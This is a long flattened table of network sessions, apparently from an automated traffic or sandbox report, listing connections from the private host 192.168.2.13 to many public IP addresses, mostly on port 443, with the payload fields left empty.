                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23256192.168.2.1334148141.38.237.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23257192.168.2.1352820210.149.43.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23258192.168.2.134403076.234.253.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23259192.168.2.135609871.61.250.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23260192.168.2.134299493.14.15.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23261192.168.2.1343242124.33.12.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23262192.168.2.133422818.245.131.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23263192.168.2.1343490101.116.251.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23264192.168.2.1357472194.254.136.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23265192.168.2.135178895.246.132.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23266192.168.2.1357534134.146.95.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23267192.168.2.134546058.35.94.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23268192.168.2.1360116171.103.103.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23269192.168.2.1338854186.20.125.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23270192.168.2.1335018132.135.232.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23271192.168.2.135540220.191.11.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23272192.168.2.133671639.162.186.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23273192.168.2.133456013.123.196.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23274192.168.2.1346516128.189.252.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23275192.168.2.134111494.245.127.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23276192.168.2.1360212208.80.141.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23277192.168.2.1341376187.196.185.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23278192.168.2.134448081.149.77.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23279192.168.2.1346694103.97.246.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23280192.168.2.1354276181.149.68.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23281192.168.2.133751854.130.102.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23282192.168.2.134911872.150.15.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23283192.168.2.134654058.167.169.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23284192.168.2.133990690.109.111.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23285192.168.2.1348250213.254.93.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23286192.168.2.135724288.19.114.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23287192.168.2.1358470167.193.85.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23288192.168.2.135865697.140.146.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23289192.168.2.1344988199.63.48.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23290192.168.2.1345678157.33.112.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23291192.168.2.134557262.164.156.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23292192.168.2.1355792184.240.93.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23293192.168.2.135938494.33.107.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23294192.168.2.134625044.27.168.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23295192.168.2.1354672176.41.250.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23296192.168.2.1344056109.97.66.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23297192.168.2.134874254.224.93.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23298192.168.2.134821831.110.146.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23299192.168.2.1336938184.132.188.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23300192.168.2.134800097.169.0.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23301192.168.2.1360784201.70.126.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23302192.168.2.1334516161.7.242.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23303192.168.2.1341732157.156.191.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23304192.168.2.133396849.249.209.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23305192.168.2.1342204116.9.226.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23306192.168.2.134346820.100.223.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23307192.168.2.13451605.20.49.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23308192.168.2.133517637.200.76.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23309192.168.2.1342808221.224.197.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23310192.168.2.1347990147.90.238.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23311192.168.2.1358892166.94.37.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23312192.168.2.1359474219.114.250.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23313192.168.2.1337056200.179.102.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23314192.168.2.1350852107.49.80.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23315192.168.2.1356068211.174.55.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23316192.168.2.1344002104.21.84.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23317192.168.2.1355430174.240.58.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23318192.168.2.1348188179.76.6.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23319192.168.2.134742651.94.67.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23320192.168.2.1347972183.129.114.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23321192.168.2.1355146154.54.135.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23322192.168.2.133885871.85.87.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23323192.168.2.1352674152.33.89.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23324192.168.2.1339908166.250.70.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23325192.168.2.134989490.52.89.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23326192.168.2.1338028124.112.23.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23327192.168.2.134825499.188.56.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23328192.168.2.1356120219.121.109.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23329192.168.2.1336052139.35.81.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23330192.168.2.1349348198.185.40.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23331192.168.2.1341914144.188.73.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23332192.168.2.1354414126.120.114.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23333192.168.2.1354334146.146.67.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23334192.168.2.133657220.188.122.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23335192.168.2.1353678220.142.153.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23336192.168.2.133556282.222.89.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23337192.168.2.1359982109.19.95.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23338192.168.2.1355656168.184.7.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23339192.168.2.13412764.55.53.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23340192.168.2.1339674128.4.200.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23341192.168.2.135555479.208.33.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23342192.168.2.1350520152.228.223.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23343192.168.2.134825637.197.205.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23344192.168.2.134831840.17.43.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23345192.168.2.1352616198.242.18.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23346192.168.2.1355398195.244.32.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23347192.168.2.133374212.171.200.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23348192.168.2.1351544186.70.49.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23349192.168.2.1357166138.195.222.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23350192.168.2.135751273.161.149.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23351192.168.2.135671887.48.77.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23352192.168.2.134281231.122.113.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23353192.168.2.135140664.207.32.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23354192.168.2.1349034100.141.113.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23355192.168.2.1348180220.160.6.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23356192.168.2.1357318155.212.200.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23357192.168.2.1335074168.172.237.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23358192.168.2.1343512185.204.93.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23359192.168.2.134645259.117.12.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23360192.168.2.1333568178.251.250.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23361192.168.2.1356512137.160.3.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23362192.168.2.133512243.217.8.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23363192.168.2.1340832129.2.7.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23364192.168.2.134914840.61.126.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23365192.168.2.1342214212.72.6.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23366192.168.2.1358418171.223.116.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23367192.168.2.1352982151.124.163.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23368192.168.2.134350074.208.185.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23369192.168.2.1334620178.135.32.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23370192.168.2.1345844125.59.55.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23371192.168.2.1351106107.24.249.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23372192.168.2.134064873.136.236.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23373192.168.2.1359658121.116.90.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23374192.168.2.133709620.82.111.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23375192.168.2.133555484.103.160.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23376192.168.2.13385684.142.147.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23377192.168.2.134471880.134.53.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23378192.168.2.1343266132.59.89.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23379192.168.2.135243642.208.189.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23380192.168.2.1346020168.22.129.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23381192.168.2.1353600210.222.156.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23382192.168.2.134014045.102.119.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23383192.168.2.1352214104.85.222.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23384192.168.2.134923061.107.121.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23385192.168.2.135561494.251.35.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23386192.168.2.1345902178.146.13.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23387192.168.2.1344388211.0.23.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23388192.168.2.1358316133.60.79.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23389192.168.2.134451685.73.12.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23390192.168.2.1343676221.32.87.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23391192.168.2.1335534222.84.227.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23392192.168.2.134982075.156.237.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23393192.168.2.1356548126.220.226.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23394192.168.2.134007273.121.230.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23395192.168.2.1353502143.4.175.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23396192.168.2.1349700110.85.224.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23397192.168.2.1344628104.63.131.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23398192.168.2.1355030170.222.240.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23399192.168.2.1337408212.217.207.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23400192.168.2.1357464202.194.170.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23401192.168.2.1349586103.91.203.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23402192.168.2.134029476.100.108.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23403192.168.2.1344706221.31.14.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23404192.168.2.1338560133.228.194.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23405192.168.2.134888876.170.234.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23406192.168.2.133841834.54.114.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23407192.168.2.13561968.140.251.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23408192.168.2.133921213.89.72.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23409192.168.2.1340646218.68.156.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23410192.168.2.134287645.94.249.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23411192.168.2.1357784168.56.149.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23412192.168.2.1356946155.109.232.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23413192.168.2.1349210195.241.169.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23414192.168.2.133395254.182.146.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23415192.168.2.1334260116.174.134.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23416192.168.2.135121643.36.226.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23417192.168.2.1337866162.213.117.2318080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23418192.168.2.1356868156.59.77.2288080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23419192.168.2.1332978159.172.223.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23420192.168.2.135006881.221.127.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23421192.168.2.1345634149.171.41.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23422192.168.2.1350870221.136.165.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23423192.168.2.1335016153.193.13.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23424192.168.2.13572749.59.37.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23425192.168.2.133662096.105.229.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23426192.168.2.1337130111.133.110.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23427192.168.2.134997297.193.217.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23428192.168.2.1344880120.29.3.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23429192.168.2.1333812154.28.29.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23430192.168.2.1360916223.128.91.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23431192.168.2.1356706187.178.126.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23432192.168.2.1343614175.46.87.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23433192.168.2.1360760109.126.245.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23434192.168.2.1342530150.237.151.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23435192.168.2.135239894.205.104.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23436192.168.2.133550692.226.53.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23437192.168.2.134647460.94.58.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23438192.168.2.1352882187.86.212.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23439192.168.2.134203285.7.230.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23440192.168.2.135590854.111.174.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23441192.168.2.13482768.177.198.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23442192.168.2.1335124210.214.227.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23443192.168.2.134027227.245.177.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23444192.168.2.1341280142.53.73.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23445192.168.2.1350494160.244.184.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23446192.168.2.133763089.156.133.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23447192.168.2.1348116123.175.187.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23448192.168.2.1340986145.33.118.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23449192.168.2.135412494.37.232.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23450192.168.2.134656617.226.102.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23451192.168.2.134420692.61.114.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23452192.168.2.134408253.1.43.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23453192.168.2.1333020174.185.104.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23454192.168.2.134342675.112.146.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23455192.168.2.1334694148.223.2.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23456192.168.2.135734458.119.138.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23457192.168.2.13557129.144.69.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23458192.168.2.1358714188.0.69.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23459192.168.2.135948876.152.15.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23460192.168.2.1342490140.246.220.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23461192.168.2.133726419.96.179.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23462192.168.2.1340578159.245.175.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23463192.168.2.1351594101.232.119.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23464192.168.2.134559688.167.169.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23465192.168.2.134859299.88.231.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23466192.168.2.133922690.77.194.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23467192.168.2.1350016114.153.212.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23468192.168.2.135393054.167.255.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23469192.168.2.134041858.118.29.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23470192.168.2.1342988197.207.243.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23471192.168.2.136091017.172.159.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23472192.168.2.1350626170.244.77.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23473192.168.2.135483620.3.18.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23474192.168.2.134602888.13.156.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23475192.168.2.1343642169.191.63.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23476192.168.2.1356216146.66.193.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23477192.168.2.1355296135.19.35.32443
